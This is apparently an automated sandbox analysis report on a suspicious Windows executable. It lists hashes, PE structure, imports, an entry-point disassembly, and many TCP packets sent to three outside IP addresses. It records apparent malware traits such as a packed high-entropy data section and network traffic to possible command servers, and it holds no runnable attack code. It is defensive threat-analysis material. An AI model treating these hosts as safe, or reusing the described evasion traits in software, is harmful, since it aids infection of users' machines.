                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:file.exe
                                                            File size:149504
                                                            MD5:1cf06beb83d2bd1afd1b9b62994e7549
                                                            SHA1:88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
                                                            SHA256:4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
                                                            SHA512:79196551edcb7850817c3132971d25423bd6861849e21926e03647b0d4ee76d3ee7cbe456c78d046167f196991e3d286c393a8abc22e8218ed148bc90090ffd9
                                                            SSDEEP:3072:TD+CPq0Ubn6u2DUp5Gcw2FPOXDMMMMfq2SQw7Se1Ei4KY+NzfOFV:W0qln6u2I8q25wV4V+NzcV
                                                            TLSH:02E3D0013690E072C19348755931C2F17B3BBA32E8B9894B7B5446AF4F722D2BB3674B
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I.....4.I.+...$.I.+...].I..]2.2.I.5.H...I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....5a...........

                                                            File Icon

                                                            Icon Hash:d0b4b0e0e0eaf0c0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x404c97
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x61352E95 [Sun Sep 5 20:54:45 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:2ac0f7085258eff31142b9f87cb0f218

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F9AF0E4AECCh
                                                            jmp 00007F9AF0E450ADh
                                                            sub eax, 000003A4h
                                                            je 00007F9AF0E45254h
                                                            sub eax, 04h
                                                            je 00007F9AF0E45249h
                                                            sub eax, 0Dh
                                                            je 00007F9AF0E4523Eh
                                                            dec eax
                                                            je 00007F9AF0E45235h
                                                            xor eax, eax
                                                            ret
                                                            mov eax, 00000404h
                                                            ret
                                                            mov eax, 00000412h
                                                            ret
                                                            mov eax, 00000804h
                                                            ret
                                                            mov eax, 00000411h
                                                            ret
                                                            mov edi, edi
                                                            push esi
                                                            push edi
                                                            mov esi, eax
                                                            push 00000101h
                                                            xor edi, edi
                                                            lea eax, dword ptr [esi+1Ch]
                                                            push edi
                                                            push eax
                                                            call 00007F9AF0E4643Eh
                                                            xor eax, eax
                                                            movzx ecx, ax
                                                            mov eax, ecx
                                                            mov dword ptr [esi+04h], edi
                                                            mov dword ptr [esi+08h], edi
                                                            mov dword ptr [esi+0Ch], edi
                                                            shl ecx, 10h
                                                            or eax, ecx
                                                            lea edi, dword ptr [esi+10h]
                                                            stosd
                                                            stosd
                                                            stosd
                                                            mov ecx, 004219A8h
                                                            add esp, 0Ch
                                                            lea eax, dword ptr [esi+1Ch]
                                                            sub ecx, esi
                                                            mov edi, 00000101h
                                                            mov dl, byte ptr [ecx+eax]
                                                            mov byte ptr [eax], dl
                                                            inc eax
                                                            dec edi
                                                            jne 00007F9AF0E45229h
                                                            lea eax, dword ptr [esi+0000011Dh]
                                                            mov esi, 00000100h
                                                            mov dl, byte ptr [eax+ecx]
                                                            mov byte ptr [eax], dl
                                                            inc eax
                                                            dec esi
                                                            jne 00007F9AF0E45229h
                                                            pop edi
                                                            pop esi
                                                            ret
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0000051Ch
                                                            mov eax, dword ptr [004225B0h]
                                                            xor eax, ebp
                                                            mov dword ptr [ebp-04h], eax
                                                            push ebx
                                                            push edi
                                                            lea eax, dword ptr [ebp-00000518h]
                                                            push eax
                                                            push dword ptr [esi+04h]
                                                            call dword ptr [00401170h]
                                                            mov edi, 00000100h

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [C++] VS2008 build 21022
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x10a9c0x50.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x3050.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cd80x40.text
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x23c.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x107d40x10800False0.5119702888257576data6.1002379149502355IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .data0x120000x442680x10a00False0.9444313909774437data7.840969501400703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x570000x30500x3200False0.62859375data5.648259802287169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            JEBOPOZUSUHARAFA0x594300x55fASCII text, with very long lines (1375), with no line terminatorsRaeto-RomanceSwitzerland
                                                            RT_ICON0x572b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                                            RT_ICON0x579780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                                            RT_ICON0x57ee00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                                            RT_ICON0x58f880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                                            RT_STRING0x59b780x2d8dataRaeto-RomanceSwitzerland
                                                            RT_STRING0x59e500x1fcdataRaeto-RomanceSwitzerland
                                                            RT_ACCELERATOR0x599900xa0dataRaeto-RomanceSwitzerland
                                                            RT_GROUP_ICON0x593f00x3edataRaeto-RomanceSwitzerland
                                                            RT_VERSION0x59a300x148x86 executable not stripped

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllOpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
                                                            GDI32.dllGetCharWidthA, GetCharABCWidthsA
                                                            WINHTTP.dllWinHttpSetOption

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            Raeto-RomanceSwitzerland

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 30, 2022 00:10:58.035403967 CET4971980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:10:58.229374886 CET8049719200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:10:58.229625940 CET4971980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:10:58.231497049 CET4971980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:10:58.231524944 CET4971980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:10:58.421336889 CET8049719200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:10:59.088948011 CET8049719200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:10:59.088963032 CET8049719200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:10:59.089210033 CET4971980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:10:59.089210033 CET4971980192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:10:59.284754992 CET8049719200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:10:59.588172913 CET4972180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:10:59.871526003 CET8049721211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:10:59.875227928 CET4972180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:10:59.875227928 CET4972180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:10:59.878920078 CET4972180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:00.162935019 CET8049721211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:01.062212944 CET8049721211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:01.062257051 CET8049721211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:01.062350035 CET4972180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:01.062437057 CET4972180192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:01.345091105 CET8049721211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:01.563965082 CET4972280192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:01.758471966 CET8049722200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:01.758625984 CET4972280192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:01.770284891 CET4972280192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:01.770348072 CET4972280192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:01.964965105 CET8049722200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:03.587111950 CET8049722200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:03.587126970 CET8049722200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:03.587363958 CET4972280192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:03.587455988 CET4972280192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:03.620733023 CET4972380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:03.785115004 CET8049722200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:03.808873892 CET8049723200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:03.811898947 CET4972380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:03.812041044 CET4972380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:03.813934088 CET4972380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:04.007215977 CET8049723200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:04.692003965 CET8049723200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:04.692301035 CET4972380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:04.697622061 CET8049723200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:04.697813034 CET4972380192.168.2.6200.46.66.71
                                                            Nov 30, 2022 00:11:04.730303049 CET4972480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:04.877301931 CET8049723200.46.66.71192.168.2.6
                                                            Nov 30, 2022 00:11:05.019064903 CET8049724211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:05.019351006 CET4972480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:05.019576073 CET4972480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:05.019609928 CET4972480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:05.307938099 CET8049724211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:06.213625908 CET8049724211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:06.213686943 CET8049724211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:06.213804007 CET4972480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:06.220859051 CET4972480192.168.2.6211.59.14.90
                                                            Nov 30, 2022 00:11:06.239725113 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:06.507853985 CET8049724211.59.14.90192.168.2.6
                                                            Nov 30, 2022 00:11:06.509285927 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.509438038 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:06.509569883 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:06.779181957 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779318094 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779341936 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779361963 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779381037 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779402018 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779421091 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779442072 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779469967 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779474974 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:06.779491901 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779517889 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:06.779524088 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:06.779562950 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:06.779591084 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049257040 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049336910 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049379110 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049421072 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049422979 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049462080 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049470901 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049504042 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049546957 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049582005 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049603939 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049649954 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049675941 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049690962 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049731970 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049753904 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049786091 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049829006 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049858093 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049870014 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049920082 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049925089 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.049959898 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.049999952 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.050004005 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.050044060 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.050085068 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.050086975 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.050128937 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.050247908 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.319905043 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.319977999 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320123911 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320178986 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320230961 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320242882 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.320281982 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320342064 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.320350885 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320364952 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.320466042 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320518017 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320576906 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320626974 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320682049 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320740938 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320791960 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320842028 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320883036 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.320892096 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320941925 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.320956945 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.320991993 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321042061 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321099997 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321158886 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321208954 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321217060 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321259975 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321278095 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321310043 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321358919 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321408033 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321456909 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321476936 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321507931 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321557999 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321559906 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321608067 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321656942 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321657896 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321707964 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321758032 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321759939 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321809053 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321857929 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321866035 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.321908951 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321958065 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.321959972 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.322007895 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.322057009 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.322061062 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.322112083 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.322161913 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592087984 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592130899 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592175961 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592217922 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592221975 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592258930 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592288971 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592300892 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592341900 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592359066 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592377901 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592417955 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592431068 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592459917 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592498064 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592514038 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592540979 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592580080 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592583895 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592617035 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592659950 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592670918 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592700005 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592741013 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592747927 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592778921 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592818975 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592819929 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592859983 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592900991 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592905998 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.592941046 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592981100 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.592983007 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593019009 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593060970 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593096018 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593136072 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593174934 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593198061 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593198061 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593198061 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593218088 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593254089 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593262911 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593297005 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593306065 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593333960 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593375921 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593393087 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593408108 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593445063 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593485117 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593497038 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593522072 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593537092 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593559027 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593596935 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593610048 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:07.593637943 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:07.593677998 CET8049725123.253.32.170192.168.2.6
